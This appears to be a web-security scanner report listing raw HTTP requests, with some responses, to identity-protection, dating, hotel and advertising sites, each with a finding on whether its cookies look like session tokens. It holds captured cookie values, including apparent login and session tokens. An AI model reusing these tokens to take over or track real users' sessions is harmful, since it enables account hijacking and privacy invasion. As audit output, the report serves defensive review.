GET /dsatserving2/servlet/log?pxid=1124&nlt=ltpx&url=http%3A%2F%2Fwww.identityguard.com%2Fipages%2Fle4%2Fletp30daysfree1.html%3Fmktp%3DNext%26utm_medium%3Daffiliates%26hid%3D205557649%26campid%3D13%26c1%3Did4%2B106163471CD1%26c2%3DCD1%26cenhp1%3D1&impt=0&imps=0 HTTP/1.1 Host: leadback.netseer.com Proxy-Connection: keep-alive Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /EnrollmentStep1?storeId=10051&MID=40642&mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1 Host: secure.identityguard.com Connection: keep-alive Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; 90226925_clogin=l=1303614597&v=1&e=1303615916987
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /portal/login HTTP/1.1 Host: secure.lifelock.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" > <html> <head> <title>LifeLock Member Portal | Sign In</title> <link href="../styles/login.css" rel="stylesheet" type="text/css" med ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.dictof.com Proxy-Connection: keep-alive Referer: http://kroogy.com/pub/banner_728_90_random.php User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Online dating with w ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /otc/landing.ehtml?%255estart=&companyName=cj_esnp3r&AID=10751987&PID=1911961&SID=gid9a%2bidentity%2btheft%2bresource_ordering34--2011-04-23--20-10-04CD1 HTTP/1.1 Host: www.econsumer.equifax.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.hotelclub.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bluepixel/cnt-gif1x1.php?second=1&e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1 Host: 2byto.com Proxy-Connection: keep-alive Referer: http://www.dictof.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cnscc=1303648022
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bluepixel/cnt-gif1x1.php?e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1 Host: 2byto.com Proxy-Connection: keep-alive Referer: http://www.dictof.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=78334213420748700&clkurl=http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1 Host: ad.amgdgt.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUknmntfmI4gkEaJqB02eiFjl3sHgDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMbAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GEGKFMwYGYCCjPrtWZknIfoBAsMbMQ--
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: UA=AAAAAQAUBmuE9vQaUZPvGEt_WOLrL1FD0BkDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357TVwyA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpANBr6bMxgY2BkYAm8xMgEVMRgwMgApBTMwtbQALMiSycgKFGQJYWJlZAMy5HcxMrDBHQc2BgAGbyFK; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 12:29:25 GMT; Path=/ Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache, no-store P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript;charset=UTF-8 Content-Length: 4062 Date: Sun, 24 Apr 2011 12:29:24 GMT
_289668_amg_acamp_id=166308; _289668_amg_pcamp_id=69113; _289668_amg_location_id=55366; _289668_amg_creative_id=289668; _289668_amg_loaded=true; var _amg_289668_content='<script type="text/javascript" ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 HTTP/1.1 Host: ad.amgdgt.com Proxy-Connection: keep-alive Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUSEtGmJ_d6tEMmF6Ld72CP1yPoOsDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357ZZkvA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpANBr6bMxgY2BkYAm8xMgEVMRgwMgApBTMwtbQALMiSycgKFGQJYWJlZAMy5HcxMrDBHQc2BgAF6CFI
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Set-Cookie: UA=AAAAAQAUelvbcSQnrAxyasYlpB02IBM3QRUDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357ZZkvA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpDNiNPOOpNlQHkG380ZDAwcQIfsZAQqZgi8xcgEpBgMwDwFMzC1tAAsyJLJyAqUYwlhYmVkAzLkdzEysIHdX2eyAmQWAwMAIV8oiw--; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 12:31:25 GMT; Path=/ Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache, no-store P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Location: http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http://pub.retailer-amazon.net/banner_120_600_a.php/clickenc=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&sig=AGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A&client=ca-pub-6888065668292638&adurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 Content-Length: 0 Date: Sun, 24 Apr 2011 12:31:25 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pixel?id=1021183&t=2 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://www.lifelock.com/about/lifelock-in-the-community/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; lifb=o1s9XS8(?nv?!8H; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!!v!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!#<wb#h!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!$<wb#g!!L[f!!!!#<wYl+!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#+<r!!!!#<wO:5!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#5[N!!!!#<vl)_!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#UDP!!!!)<wYiT!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#q),!!!!#<wO:5!#q2T!!!!$<wb#g!#q2U!!!!$<wb#g!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$#WA!!!!$<w[_`!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; BX=8khj7j56qmjsh&b=4&s=dk&t=106
Response
